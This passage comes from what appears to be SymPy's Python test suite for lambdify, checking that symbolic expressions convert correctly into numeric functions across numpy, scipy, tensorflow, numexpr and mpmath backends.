l = lambdify(y, Integral(f(x), (x, y, oo)))
d = l(-oo)
assert 1.77245385 < d < 1.772453851
def test_double_integral():
# example from http://mpmath.org/doc/current/calculus/integration.html
i = Integral(1/(1 - x**2*y**2), (x, 0, 1), (y, 0, z))
l = lambdify([z], i)
d = l(1)
assert 1.23370055 < d < 1.233700551
#================== Test vectors ===================================
def test_vector_simple():
f = lambdify((x, y, z), (z, y, x))
assert f(3, 2, 1) == (1, 2, 3)
assert f(1.0, 2.0, 3.0) == (3.0, 2.0, 1.0)
# make sure correct number of args required
raises(TypeError, lambda: f(0))
def test_vector_discontinuous():
f = lambdify(x, (-1/x, 1/x))
raises(ZeroDivisionError, lambda: f(0))
assert f(1) == (-1.0, 1.0)
assert f(2) == (-0.5, 0.5)
assert f(-2) == (0.5, -0.5)
def test_trig_symbolic():
f = lambdify([x], [cos(x), sin(x)], 'math')
d = f(pi)
assert abs(d[0] + 1) < 0.0001
assert abs(d[1] - 0) < 0.0001
def test_trig_float():
f = lambdify([x], [cos(x), sin(x)])
d = f(3.14159)
assert abs(d[0] + 1) < 0.0001
assert abs(d[1] - 0) < 0.0001
def test_docs():
f = lambdify(x, x**2)
assert f(2) == 4
f = lambdify([x, y, z], [z, y, x])
assert f(1, 2, 3) == [3, 2, 1]
f = lambdify(x, sqrt(x))
assert f(4) == 2.0
f = lambdify((x, y), sin(x*y)**2)
assert f(0, 5) == 0
def test_math():
f = lambdify((x, y), sin(x), modules="math")
assert f(0, 5) == 0
def test_sin():
f = lambdify(x, sin(x)**2)
assert isinstance(f(2), float)
f = lambdify(x, sin(x)**2, modules="math")
assert isinstance(f(2), float)
def test_matrix():
A = Matrix([[x, x*y], [sin(z) + 4, x**z]])
sol = Matrix([[1, 2], [sin(3) + 4, 1]])
f = lambdify((x, y, z), A, modules="sympy")
assert f(1, 2, 3) == sol
f = lambdify((x, y, z), (A, [A]), modules="sympy")
assert f(1, 2, 3) == (sol, [sol])
J = Matrix((x, x + y)).jacobian((x, y))
v = Matrix((x, y))
sol = Matrix([[1, 0], [1, 1]])
assert lambdify(v, J, modules='sympy')(1, 2) == sol
assert lambdify(v.T, J, modules='sympy')(1, 2) == sol
def test_numpy_matrix():
if not numpy:
skip("numpy not installed.")
A = Matrix([[x, x*y], [sin(z) + 4, x**z]])
sol_arr = numpy.array([[1, 2], [numpy.sin(3) + 4, 1]])
#Lambdify array first, to ensure return to array as default
f = lambdify((x, y, z), A, ['numpy'])
numpy.testing.assert_allclose(f(1, 2, 3), sol_arr)
#Check that the types are arrays and matrices
assert isinstance(f(1, 2, 3), numpy.ndarray)
# gh-15071
class dot(Function):
pass
x_dot_mtx = dot(x, Matrix([[2], [1], [0]]))
f_dot1 = lambdify(x, x_dot_mtx)
inp = numpy.zeros((17, 3))
assert numpy.all(f_dot1(inp) == 0)
strict_kw = dict(allow_unknown_functions=False, inline=True, fully_qualified_modules=False)
p2 = NumPyPrinter(dict(user_functions={'dot': 'dot'}, **strict_kw))
f_dot2 = lambdify(x, x_dot_mtx, printer=p2)
assert numpy.all(f_dot2(inp) == 0)
p3 = NumPyPrinter(strict_kw)
# The line below should probably fail upon construction (before calling with "(inp)"):
raises(Exception, lambda: lambdify(x, x_dot_mtx, printer=p3)(inp))
def test_numpy_transpose():
if not numpy:
skip("numpy not installed.")
A = Matrix([[1, x], [0, 1]])
f = lambdify((x), A.T, modules="numpy")
numpy.testing.assert_array_equal(f(2), numpy.array([[1, 0], [2, 1]]))
def test_numpy_dotproduct():
if not numpy:
skip("numpy not installed")
A = Matrix([x, y, z])
f1 = lambdify([x, y, z], DotProduct(A, A), modules='numpy')
f2 = lambdify([x, y, z], DotProduct(A, A.T), modules='numpy')
f3 = lambdify([x, y, z], DotProduct(A.T, A), modules='numpy')
f4 = lambdify([x, y, z], DotProduct(A, A.T), modules='numpy')
assert f1(1, 2, 3) == \
f2(1, 2, 3) == \
f3(1, 2, 3) == \
f4(1, 2, 3) == \
numpy.array([14])
def test_numpy_inverse():
if not numpy:
skip("numpy not installed.")
A = Matrix([[1, x], [0, 1]])
f = lambdify((x), A**-1, modules="numpy")
numpy.testing.assert_array_equal(f(2), numpy.array([[1, -2], [0, 1]]))
def test_numpy_old_matrix():
if not numpy:
skip("numpy not installed.")
A = Matrix([[x, x*y], [sin(z) + 4, x**z]])
sol_arr = numpy.array([[1, 2], [numpy.sin(3) + 4, 1]])
f = lambdify((x, y, z), A, [{'ImmutableDenseMatrix': numpy.matrix}, 'numpy'])
numpy.testing.assert_allclose(f(1, 2, 3), sol_arr)
assert isinstance(f(1, 2, 3), numpy.matrix)
def test_scipy_sparse_matrix():
if not scipy:
skip("scipy not installed.")
A = SparseMatrix([[x, 0], [0, y]])
f = lambdify((x, y), A, modules="scipy")
B = f(1, 2)
assert isinstance(B, scipy.sparse.coo_matrix)
def test_python_div_zero_issue_11306():
if not numpy:
skip("numpy not installed.")
p = Piecewise((1 / x, y < -1), (x, y < 1), (1 / x, True))
f = lambdify([x, y], p, modules='numpy')
numpy.seterr(divide='ignore')
assert float(f(numpy.array([0]),numpy.array([0.5]))) == 0
assert str(float(f(numpy.array([0]),numpy.array([1])))) == 'inf'
numpy.seterr(divide='warn')
def test_issue9474():
mods = [None, 'math']
if numpy:
mods.append('numpy')
if mpmath:
mods.append('mpmath')
for mod in mods:
f = lambdify(x, S.One/x, modules=mod)
assert f(2) == 0.5
f = lambdify(x, floor(S.One/x), modules=mod)
assert f(2) == 0
for absfunc, modules in product([Abs, abs], mods):
f = lambdify(x, absfunc(x), modules=modules)
assert f(-1) == 1
assert f(1) == 1
assert f(3+4j) == 5
def test_issue_9871():
if not numexpr:
skip("numexpr not installed.")
if not numpy:
skip("numpy not installed.")
r = sqrt(x**2 + y**2)
expr = diff(1/r, x)
xn = yn = numpy.linspace(1, 10, 16)
# expr(xn, xn) = -xn/(sqrt(2)*xn)^3
fv_exact = -numpy.sqrt(2.)**-3 * xn**-2
fv_numpy = lambdify((x, y), expr, modules='numpy')(xn, yn)
fv_numexpr = lambdify((x, y), expr, modules='numexpr')(xn, yn)
numpy.testing.assert_allclose(fv_numpy, fv_exact, rtol=1e-10)
numpy.testing.assert_allclose(fv_numexpr, fv_exact, rtol=1e-10)
def test_numpy_piecewise():
if not numpy:
skip("numpy not installed.")
pieces = Piecewise((x, x < 3), (x**2, x > 5), (0, True))
f = lambdify(x, pieces, modules="numpy")
numpy.testing.assert_array_equal(f(numpy.arange(10)),
numpy.array([0, 1, 2, 0, 0, 0, 36, 49, 64, 81]))
# If we evaluate somewhere all conditions are False, we should get back NaN
nodef_func = lambdify(x, Piecewise((x, x > 0), (-x, x < 0)))
numpy.testing.assert_array_equal(nodef_func(numpy.array([-1, 0, 1])),
numpy.array([1, numpy.nan, 1]))
def test_numpy_logical_ops():
if not numpy:
skip("numpy not installed.")
and_func = lambdify((x, y), And(x, y), modules="numpy")
and_func_3 = lambdify((x, y, z), And(x, y, z), modules="numpy")
or_func = lambdify((x, y), Or(x, y), modules="numpy")
or_func_3 = lambdify((x, y, z), Or(x, y, z), modules="numpy")
not_func = lambdify((x), Not(x), modules="numpy")
arr1 = numpy.array([True, True])
arr2 = numpy.array([False, True])
arr3 = numpy.array([True, False])
numpy.testing.assert_array_equal(and_func(arr1, arr2), numpy.array([False, True]))
numpy.testing.assert_array_equal(and_func_3(arr1, arr2, arr3), numpy.array([False, False]))
numpy.testing.assert_array_equal(or_func(arr1, arr2), numpy.array([True, True]))
numpy.testing.assert_array_equal(or_func_3(arr1, arr2, arr3), numpy.array([True, True]))
numpy.testing.assert_array_equal(not_func(arr2), numpy.array([True, False]))
def test_numpy_matmul():
if not numpy:
skip("numpy not installed.")
xmat = Matrix([[x, y], [z, 1+z]])
ymat = Matrix([[x**2], [Abs(x)]])
mat_func = lambdify((x, y, z), xmat*ymat, modules="numpy")
numpy.testing.assert_array_equal(mat_func(0.5, 3, 4), numpy.array([[1.625], [3.5]]))
numpy.testing.assert_array_equal(mat_func(-0.5, 3, 4), numpy.array([[1.375], [3.5]]))
# Multiple matrices chained together in multiplication
f = lambdify((x, y, z), xmat*xmat*xmat, modules="numpy")
numpy.testing.assert_array_equal(f(0.5, 3, 4), numpy.array([[72.125, 119.25],
[159, 251]]))
def test_numpy_numexpr():
if not numpy:
skip("numpy not installed.")
if not numexpr:
skip("numexpr not installed.")
a, b, c = numpy.random.randn(3, 128, 128)
# ensure that numpy and numexpr return same value for complicated expression
expr = sin(x) + cos(y) + tan(z)**2 + Abs(z-y)*acos(sin(y*z)) + \
Abs(y-z)*acosh(2+exp(y-x))- sqrt(x**2+I*y**2)
npfunc = lambdify((x, y, z), expr, modules='numpy')
nefunc = lambdify((x, y, z), expr, modules='numexpr')
assert numpy.allclose(npfunc(a, b, c), nefunc(a, b, c))
def test_numexpr_userfunctions():
if not numpy:
skip("numpy not installed.")
if not numexpr:
skip("numexpr not installed.")
a, b = numpy.random.randn(2, 10)
uf = type('uf', (Function, ),
{'eval' : classmethod(lambda x, y : y**2+1)})
func = lambdify(x, 1-uf(x), modules='numexpr')
assert numpy.allclose(func(a), -(a**2))
uf = implemented_function(Function('uf'), lambda x, y : 2*x*y+1)
func = lambdify((x, y), uf(x, y), modules='numexpr')
assert numpy.allclose(func(a, b), 2*a*b+1)
def test_tensorflow_basic_math():
if not tensorflow:
skip("tensorflow not installed.")
expr = Max(sin(x), Abs(1/(x+2)))
func = lambdify(x, expr, modules="tensorflow")
with tensorflow.compat.v1.Session() as s:
a = tensorflow.constant(0, dtype=tensorflow.float32)
assert func(a).eval(session=s) == 0.5
def test_tensorflow_placeholders():
if not tensorflow:
skip("tensorflow not installed.")
expr = Max(sin(x), Abs(1/(x+2)))
func = lambdify(x, expr, modules="tensorflow")
with tensorflow.compat.v1.Session() as s:
a = tensorflow.compat.v1.placeholder(dtype=tensorflow.float32)
assert func(a).eval(session=s, feed_dict={a: 0}) == 0.5
def test_tensorflow_variables():
if not tensorflow:
skip("tensorflow not installed.")
expr = Max(sin(x), Abs(1/(x+2)))
func = lambdify(x, expr, modules="tensorflow")
with tensorflow.compat.v1.Session() as s:
a = tensorflow.Variable(0, dtype=tensorflow.float32)
s.run(a.initializer)
assert func(a).eval(session=s, feed_dict={a: 0}) == 0.5
def test_tensorflow_logical_operations():
if not tensorflow:
skip("tensorflow not installed.")
expr = Not(And(Or(x, y), y))
func = lambdify([x, y], expr, modules="tensorflow")
with tensorflow.compat.v1.Session() as s:
assert func(False, True).eval(session=s) == False
def test_tensorflow_piecewise():
if not tensorflow:
skip("tensorflow not installed.")
expr = Piecewise((0, Eq(x,0)), (-1, x < 0), (1, x > 0))
func = lambdify(x, expr, modules="tensorflow")
with tensorflow.compat.v1.Session() as s:
assert func(-1).eval(session=s) == -1
assert func(0).eval(session=s) == 0
assert func(1).eval(session=s) == 1
def test_tensorflow_multi_max():
if not tensorflow:
skip("tensorflow not installed.")
expr = Max(x, -x, x**2)
func = lambdify(x, expr, modules="tensorflow")
with tensorflow.compat.v1.Session() as s:
assert func(-2).eval(session=s) == 4
def test_tensorflow_multi_min():
if not tensorflow:
skip("tensorflow not installed.")
expr = Min(x, -x, x**2)
func = lambdify(x, expr, modules="tensorflow")
with tensorflow.compat.v1.Session() as s:
assert func(-2).eval(session=s) == -2
def test_tensorflow_relational():
if not tensorflow:
skip("tensorflow not installed.")
expr = x >= 0
func = lambdify(x, expr, modules="tensorflow")
with tensorflow.compat.v1.Session() as s:
assert func(1).eval(session=s) == True
def test_tensorflow_complexes():
if not tensorflow:
skip("tensorflow not installed")
func1 = lambdify(x, re(x), modules="tensorflow")
func2 = lambdify(x, im(x), modules="tensorflow")
func3 = lambdify(x, Abs(x), modules="tensorflow")
func4 = lambdify(x, arg(x), modules="tensorflow")
with tensorflow.compat.v1.Session() as s:
        # For TensorFlow versions released before
        # https://github.com/tensorflow/tensorflow/issues/30029 was resolved,
        # passing plain Python numeric types may not work
a = tensorflow.constant(1+2j)
assert func1(a).eval(session=s) == 1
assert func2(a).eval(session=s) == 2
tensorflow_result = func3(a).eval(session=s)
sympy_result = Abs(1 + 2j).evalf()
assert abs(tensorflow_result-sympy_result) < 10**-6
tensorflow_result = func4(a).eval(session=s)
sympy_result = arg(1 + 2j).evalf()
assert abs(tensorflow_result-sympy_result) < 10**-6
def test_tensorflow_array_arg():
# Test for issue 14655 (tensorflow part)
if not tensorflow:
skip("tensorflow not installed.")
f = lambdify([[x, y]], x*x + y, 'tensorflow')
with tensorflow.compat.v1.Session() as s:
fcall = f(tensorflow.constant([2.0, 1.0]))
assert fcall.eval(session=s) == 5.0
#================== Test symbolic ==================================
def test_sym_single_arg():
f = lambdify(x, x * y)
assert f(z) == z * y
def test_sym_list_args():
f = lambdify([x, y], x + y + z)
assert f(1, 2) == 3 + z
def test_sym_integral():
f = Lambda(x, exp(-x**2))
l = lambdify(x, Integral(f(x), (x, -oo, oo)), modules="sympy")
assert l(y) == Integral(exp(-y**2), (y, -oo, oo))
assert l(y).doit() == sqrt(pi)
def test_namespace_order():
# lambdify had a bug, such that module dictionaries or cached module
# dictionaries would pull earlier namespaces into themselves.
# Because the module dictionaries form the namespace of the
# generated lambda, this meant that the behavior of a previously
# generated lambda function could change as a result of later calls
# to lambdify.
n1 = {'f': lambda x: 'first f'}
n2 = {'f': lambda x: 'second f',
'g': lambda x: 'function g'}
f = sympy.Function('f')
g = sympy.Function('g')
if1 = lambdify(x, f(x), modules=(n1, "sympy"))
assert if1(1) == 'first f'
if2 = lambdify(x, g(x), modules=(n2, "sympy"))
# previously gave 'second f'
assert if1(1) == 'first f'
assert if2(1) == 'function g'
def test_namespace_type():
# lambdify had a bug where it would reject modules of type unicode
# on Python 2.
x = sympy.Symbol('x')
lambdify(x, x, modules='math')
def test_imps():
# Here we check if the default returned functions are anonymous - in
# the sense that we can have more than one function with the same name
f = implemented_function('f', lambda x: 2*x)
g = implemented_function('f', lambda x: math.sqrt(x))
l1 = lambdify(x, f(x))
l2 = lambdify(x, g(x))
assert str(f(x)) == str(g(x))
assert l1(3) == 6
assert l2(3) == math.sqrt(3)
# check that we can pass in a Function as input
func = sympy.Function('myfunc')
assert not hasattr(func, '_imp_')
my_f = implemented_function(func, lambda x: 2*x)
assert hasattr(my_f, '_imp_')
# Error for functions with same name and different implementation
f2 = implemented_function("f", lambda x: x + 101)
raises(ValueError, lambda: lambdify(x, f(f2(x))))
def test_imps_errors():
# Test errors that implemented functions can return, and still be able to
# form expressions.
# See: https://github.com/sympy/sympy/issues/10810
#
# XXX: Removed AttributeError here. This test was added due to issue 10810
# but that issue was about ValueError. It doesn't seem reasonable to
# "support" catching AttributeError in the same context...
for val, error_class in product((0, 0., 2, 2.0), (TypeError, ValueError)):
def myfunc(a):
if a == 0:
raise error_class
return 1
f = implemented_function('f', myfunc)
expr = f(val)
assert expr == f(val)
def test_imps_wrong_args():
raises(ValueError, lambda: implemented_function(sin, lambda x: x))
def test_lambdify_imps():
# Test lambdify with implemented functions
# first test basic (sympy) lambdify
f = sympy.cos
assert lambdify(x, f(x))(0) == 1
assert lambdify(x, 1 + f(x))(0) == 2
assert lambdify((x, y), y + f(x))(0, 1) == 2
# make an implemented function and test
f = implemented_function("f", lambda x: x + 100)
assert lambdify(x, f(x))(0) == 100
assert lambdify(x, 1 + f(x))(0) == 101
assert lambdify((x, y), y + f(x))(0, 1) == 101
# Can also handle tuples, lists, dicts as expressions
lam = lambdify(x, (f(x), x))
assert lam(3) == (103, 3)
lam = lambdify(x, [f(x), x])
assert lam(3) == [103, 3]
lam = lambdify(x, [f(x), (f(x), x)])
assert lam(3) == [103, (103, 3)]
lam = lambdify(x, {f(x): x})
assert lam(3) == {103: 3}
lam = lambdify(x, {f(x): x})
assert lam(3) == {103: 3}
lam = lambdify(x, {x: f(x)})
assert lam(3) == {3: 103}
# Check that imp preferred to other namespaces by default
d = {'f': lambda x: x + 99}
lam = lambdify(x, f(x), d)
assert lam(3) == 103
# Unless flag passed
lam = lambdify(x, f(x), d, use_imps=False)
assert lam(3) == 102
def test_dummification():
t = symbols('t')
F = Function('F')
G = Function('G')
#"\alpha" is not a valid python variable name
#lambdify should sub in a dummy for it, and return
#without a syntax error
alpha = symbols(r'\alpha')
some_expr = 2 * F(t)**2 / G(t)
lam = lambdify((F(t), G(t)), some_expr)
assert lam(3, 9) == 2
lam = lambdify(sin(t), 2 * sin(t)**2)
assert lam(F(t)) == 2 * F(t)**2
#Test that \alpha was properly dummified
lam = lambdify((alpha, t), 2*alpha + t)
assert lam(2, 1) == 5
raises(SyntaxError, lambda: lambdify(F(t) * G(t), F(t) * G(t) + 5))
raises(SyntaxError, lambda: lambdify(2 * F(t), 2 * F(t) + 5))
raises(SyntaxError, lambda: lambdify(2 * F(t), 4 * F(t) + 5))
def test_curly_matrix_symbol():
# Issue #15009
curlyv = sympy.MatrixSymbol("{v}", 2, 1)
lam = lambdify(curlyv, curlyv)
assert lam(1)==1
lam = lambdify(curlyv, curlyv, dummify=True)
assert lam(1)==1
def test_python_keywords():
# Test for issue 7452. The automatic dummification should ensure use of
# Python reserved keywords as symbol names will create valid lambda
# functions. This is an additional regression test.
python_if = symbols('if')
expr = python_if / 2
f = lambdify(python_if, expr)
assert f(4.0) == 2.0
def test_lambdify_docstring():
func = lambdify((w, x, y, z), w + x + y + z)
ref = (
"Created with lambdify. Signature:\n\n"
"func(w, x, y, z)\n\n"
"Expression:\n\n"
"w + x + y + z"
).splitlines()
assert func.__doc__.splitlines()[:len(ref)] == ref
syms = symbols('a1:26')
func = lambdify(syms, sum(syms))
ref = (
"Created with lambdify. Signature:\n\n"
"func(a1, a2, a3, a4, a5, a6, a7, a8, a9, a10, a11, a12, a13, a14, a15,\n"
" a16, a17, a18, a19, a20, a21, a22, a23, a24, a25)\n\n"
"Expression:\n\n"
"a1 + a10 + a11 + a12 + a13 + a14 + a15 + a16 + a17 + a18 + a19 + a2 + a20 +..."
).splitlines()
assert func.__doc__.splitlines()[:len(ref)] == ref
#================== Test special printers ==========================
def test_special_printers():
from sympy.polys.numberfields import IntervalPrinter
def intervalrepr(expr):
return IntervalPrinter().doprint(expr)
expr = sqrt(sqrt(2) + sqrt(3)) + S.Half
func0 = lambdify((), expr, modules="mpmath", printer=intervalrepr)
func1 = lambdify((), expr, modules="mpmath", printer=IntervalPrinter)
func2 = lambdify((), expr, modules="mpmath", printer=IntervalPrinter())
mpi = type(mpmath.mpi(1, 2))
assert isinstance(func0(), mpi)
assert isinstance(func1(), mpi)
assert isinstance(func2(), mpi)
    # Check that lambdify with loggamma works for the mpmath module
exp1 = lambdify(x, loggamma(x), 'mpmath')(5)
exp2 = lambdify(x, loggamma(x), 'mpmath')(1.8)
exp3 = lambdify(x, loggamma(x), 'mpmath')(15)
exp_ls = [exp1, exp2, exp3]
sol1 = mpmath.loggamma(5)
sol2 = mpmath.loggamma(1.8)
sol3 = mpmath.loggamma(15)
sol_ls = [sol1, sol2, sol3]
assert exp_ls == sol_ls
def test_true_false():
    # We want an exact identity ("is") comparison here, not just ==
assert lambdify([], true)() is True
assert lambdify([], false)() is False
def test_issue_2790():
assert lambdify((x, (y, z)), x + y)(1, (2, 4)) == 3
assert lambdify((x, (y, (w, z))), w + x + y + z)(1, (2, (3, 4))) == 10
assert lambdify(x, x + 1, dummify=False)(1) == 2
def test_issue_12092():
f = implemented_function('f', lambda x: x**2)
assert f(f(2)).evalf() == Float(16)
def test_issue_14911():
class Variable(sympy.Symbol):
def _sympystr(self, printer):
return printer.doprint(self.name)
_lambdacode = _sympystr
_numpycode = _sympystr
x = Variable('x')
y = 2 * x
code = LambdaPrinter().doprint(y)
assert code.replace(' ', '') == '2*x'
def test_ITE():
assert lambdify((x, y, z), ITE(x, y, z))(True, 5, 3) == 5
assert lambdify((x, y, z), ITE(x, y, z))(False, 5, 3) == 3
def test_Min_Max():
# see gh-10375
assert lambdify((x, y, z), Min(x, y, z))(1, 2, 3) == 1
assert lambdify((x, y, z), Max(x, y, z))(1, 2, 3) == 3
def test_Indexed():
# Issue #10934
if not numpy:
skip("numpy not installed")
a = IndexedBase('a')
i, j = symbols('i j')
b = numpy.array([[1, 2], [3, 4]])
assert lambdify(a, Sum(a[x, y], (x, 0, 1), (y, 0, 1)))(b) == 10
def test_issue_12173():
#test for issue 12173
expr1 = lambdify((x, y), uppergamma(x, y),"mpmath")(1, 2)
expr2 = lambdify((x, y), lowergamma(x, y),"mpmath")(1, 2)
assert expr1 == uppergamma(1, 2).evalf()
assert expr2 == lowergamma(1, 2).evalf()
def test_issue_13642():
if not numpy:
skip("numpy not installed")
f = lambdify(x, sinc(x))
assert Abs(f(1) - sinc(1)).n() < 1e-15
def test_sinc_mpmath():
f = lambdify(x, sinc(x), "mpmath")
assert Abs(f(1) - sinc(1)).n() < 1e-15
def test_lambdify_dummy_arg():
d1 = Dummy()
f1 = lambdify(d1, d1 + 1, dummify=False)
assert f1(2) == 3
f1b = lambdify(d1, d1 + 1)
assert f1b(2) == 3
d2 = Dummy('x')
f2 = lambdify(d2, d2 + 1)
assert f2(2) == 3
f3 = lambdify([[d2]], d2 + 1)
assert f3([2]) == 3
def test_lambdify_mixed_symbol_dummy_args():
d = Dummy()
# Contrived example of name clash
dsym = symbols(str(d))
f = lambdify([d, dsym], d - dsym)
assert f(4, 1) == 3
def test_numpy_array_arg():
# Test for issue 14655 (numpy part)
if not numpy:
skip("numpy not installed")
f = lambdify([[x, y]], x*x + y, 'numpy')
assert f(numpy.array([2.0, 1.0])) == 5
def test_scipy_fns():
if not scipy:
skip("scipy not installed")
single_arg_sympy_fns = [erf, erfc, factorial, gamma, loggamma, digamma]
single_arg_scipy_fns = [scipy.special.erf, scipy.special.erfc,
scipy.special.factorial, scipy.special.gamma, scipy.special.gammaln,
scipy.special.psi]
numpy.random.seed(0)
for (sympy_fn, scipy_fn) in zip(single_arg_sympy_fns, single_arg_scipy_fns):
f = lambdify(x, sympy_fn(x), modules="scipy")
for i in range(20):
tv = numpy.random.uniform(-10, 10) + 1j*numpy.random.uniform(-5, 5)
# SciPy thinks that factorial(z) is 0 when re(z) < 0 and
# does not support complex numbers.
# SymPy does not think so.
if sympy_fn == factorial:
tv = numpy.abs(tv)
# SciPy supports gammaln for real arguments only,
# and there is also a branch cut along the negative real axis
if sympy_fn == loggamma:
tv = numpy.abs(tv)
# SymPy's digamma evaluates as polygamma(0, z)
# which SciPy supports for real arguments only
if sympy_fn == digamma:
tv = numpy.real(tv)
sympy_result = sympy_fn(tv).evalf()
assert abs(f(tv) - sympy_result) < 1e-13*(1 + abs(sympy_result))
assert abs(f(tv) - scipy_fn(tv)) < 1e-13*(1 + abs(sympy_result))
double_arg_sympy_fns = [RisingFactorial, besselj, bessely, besseli,
besselk]
double_arg_scipy_fns = [scipy.special.poch, scipy.special.jv,
scipy.special.yv, scipy.special.iv, scipy.special.kv]
for (sympy_fn, scipy_fn) in zip(double_arg_sympy_fns, double_arg_scipy_fns):
f = lambdify((x, y), sympy_fn(x, y), modules="scipy")
for i in range(20):
# SciPy supports only real orders of Bessel functions
tv1 = numpy.random.uniform(-10, 10)
tv2 = numpy.random.uniform(-10, 10) + 1j*numpy.random.uniform(-5, 5)
# SciPy supports poch for real arguments only
if sympy_fn == RisingFactorial:
tv2 = numpy.real(tv2)
sympy_result = sympy_fn(tv1, tv2).evalf()
assert abs(f(tv1, tv2) - sympy_result) < 1e-13*(1 + abs(sympy_result))
assert abs(f(tv1, tv2) - scipy_fn(tv1, tv2)) < 1e-13*(1 + abs(sympy_result))
def test_scipy_polys():
if not scipy:
skip("scipy not installed")
numpy.random.seed(0)
params = symbols('n k a b')
# list polynomials with the number of parameters
polys = [
(chebyshevt, 1),
(chebyshevu, 1),
(legendre, 1),
(hermite, 1),
(laguerre, 1),
(gegenbauer, 2),
(assoc_legendre, 2),
(assoc_laguerre, 2),
(jacobi, 3)
]
msg = \
"The random test of the function {func} with the arguments " \
"{args} had failed because the SymPy result {sympy_result} " \
"and SciPy result {scipy_result} had failed to converge " \
"within the tolerance {tol} " \
"(Actual absolute difference : {diff})"
for sympy_fn, num_params in polys:
args = params[:num_params] + (x,)
f = lambdify(args, sympy_fn(*args))
for _ in range(10):
tn = numpy.random.randint(3, 10)
tparams = tuple(numpy.random.uniform(0, 5, size=num_params-1))
tv = numpy.random.uniform(-10, 10) + 1j*numpy.random.uniform(-5, 5)
# SciPy supports hermite for real arguments only
if sympy_fn == hermite:
tv = numpy.real(tv)
# assoc_legendre needs x in (-1, 1) and integer param at most n
if sympy_fn == assoc_legendre:
tv = numpy.random.uniform(-1, 1)
tparams = tuple(numpy.random.randint(1, tn, size=1))
vals = (tn,) + tparams + (tv,)
scipy_result = f(*vals)
sympy_result = sympy_fn(*vals).evalf()
atol = 1e-9*(1 + abs(sympy_result))
diff = abs(scipy_result - sympy_result)
try:
assert diff < atol
except TypeError:
raise AssertionError(
msg.format(
func=repr(sympy_fn),
args=repr(vals),
sympy_result=repr(sympy_result),
scipy_result=repr(scipy_result),
diff=diff,
tol=atol)
)
def test_lambdify_inspect():
f = lambdify(x, x**2)
# Test that inspect.getsource works but don't hard-code implementation
# details
assert 'x**2' in inspect.getsource(f)
def test_issue_14941():
x, y = Dummy(), Dummy()
# test dict
f1 = lambdify([x, y], {x: 3, y: 3}, 'sympy')
assert f1(2, 3) == {2: 3, 3: 3}
# test tuple
f2 = lambdify([x, y], (y, x), 'sympy')
assert f2(2, 3) == (3, 2)
# test list
f3 = lambdify([x, y], [y, x], 'sympy')
assert f3(2, 3) == [3, 2]
def test_lambdify_Derivative_arg_issue_16468():
f = Function('f')(x)
fx = f.diff()
assert lambdify((f, fx), f + fx)(10, 5) == 15
assert eval(lambdastr((f, fx), f/fx))(10, 5) == 2
raises(SyntaxError, lambda:
eval(lambdastr((f, fx), f/fx, dummify=False)))
assert eval(lambdastr((f, fx), f/fx, dummify=True))(10, 5) == 2
assert eval(lambdastr((fx, f), f/fx, dummify=True))(S(10), 5) == S.Half
assert lambdify(fx, 1 + fx)(41) == 42
assert eval(lambdastr(fx, 1 + fx, dummify=True))(41) == 42
def test_imag_real():
f_re = lambdify([z], sympy.re(z))
val = 3+2j
assert f_re(val) == val.real
f_im = lambdify([z], sympy.im(z)) # see #15400
assert f_im(val) == val.imag
def test_MatrixSymbol_issue_15578():
if not numpy:
skip("numpy not installed")
A = MatrixSymbol('A', 2, 2)
A0 = numpy.array([[1, 2], [3, 4]])
f = lambdify(A, A**(-1))
assert numpy.allclose(f(A0), numpy.array([[-2., 1.], [1.5, -0.5]]))
g = lambdify(A, A**3)
assert numpy.allclose(g(A0), numpy.array([[37, 54], [81, 118]]))
def test_issue_15654():
if not scipy:
skip("scipy not installed")
from sympy.abc import n, l, r, Z
from sympy.physics import hydrogen
nv, lv, rv, Zv = 1, 0, 3, 1
sympy_value = hydrogen.R_nl(nv, lv, rv, Zv).evalf()
f = lambdify((n, l, r, Z), hydrogen.R_nl(n, l, r, Z))
scipy_value = f(nv, lv, rv, Zv)
assert abs(sympy_value - scipy_value) < 1e-15
def test_issue_15827():
if not numpy:
skip("numpy not installed")
A = MatrixSymbol("A", 3, 3)
B = MatrixSymbol("B", 2, 3)
C = MatrixSymbol("C", 3, 4)
D = MatrixSymbol("D", 4, 5)
k=symbols("k")
f = lambdify(A, (2*k)*A)
g = lambdify(A, (2+k)*A)
h = lambdify(A, 2*A)
i = lambdify((B, C, D), 2*B*C*D)
assert numpy.array_equal(f(numpy.array([[1, 2, 3], [1, 2, 3], [1, 2, 3]])), \
numpy.array([[2*k, 4*k, 6*k], [2*k, 4*k, 6*k], [2*k, 4*k, 6*k]], dtype=object))
assert numpy.array_equal(g(numpy.array([[1, 2, 3], [1, 2, 3], [1, 2, 3]])), \
numpy.array([[k + 2, 2*k + 4, 3*k + 6], [k + 2, 2*k + 4, 3*k + 6], \
[k + 2, 2*k + 4, 3*k + 6]], dtype=object))
assert numpy.array_equal(h(numpy.array([[1, 2, 3], [1, 2, 3], [1, 2, 3]])), \
numpy.array([[2, 4, 6], [2, 4, 6], [2, 4, 6]]))
assert numpy.array_equal(i(numpy.array([[1, 2, 3], [1, 2, 3]]), numpy.array([[1, 2, 3, 4], [1, 2, 3, 4], [1, 2, 3, 4]]), \
numpy.array([[1, 2, 3, 4, 5], [1, 2, 3, 4, 5], [1, 2, 3, 4, 5], [1, 2, 3, 4, 5]])), numpy.array([[ 120, 240, 360, 480, 600], \
[ 120, 240, 360, 480, 600]]))
def test_issue_16930():
if not scipy:
skip("scipy not installed")
x = symbols("x")
f = lambda x: S.GoldenRatio * x**2
f_ = lambdify(x, f(x), modules='scipy')
assert f_(1) == scipy.constants.golden_ratio
def test_issue_17898():
if not scipy:
skip("scipy not installed")
x = symbols("x")
f_ = lambdify([x], sympy.LambertW(x,-1), modules='scipy')
assert f_(0.1) == mpmath.lambertw(0.1, -1)
def test_issue_13167_21411():
if not numpy:
skip("numpy not installed")
f1 = lambdify(x, sympy.Heaviside(x))
f2 = lambdify(x, sympy.Heaviside(x, 1))
res1 = f1([-1, 0, 1])
res2 = f2([-1, 0, 1])
assert Abs(res1[0]).n() < 1e-15 # First functionality: only one argument passed
assert Abs(res1[1] - 1/2).n() < 1e-15
assert Abs(res1[2] - 1).n() < 1e-15
assert Abs(res2[0]).n() < 1e-15 # Second functionality: two arguments passed
assert Abs(res2[1] - 1).n() < 1e-15
assert Abs(res2[2] - 1).n() < 1e-15
def test_single_e():
f = lambdify(x, E)
assert f(23) == exp(1.0)
def test_issue_16536():
if not scipy:
skip("scipy not installed")
a = symbols('a')
f1 = lowergamma(a, x)
F = lambdify((a, x), f1, modules='scipy')
assert abs(lowergamma(1, 3) - F(1, 3)) <= 1e-10
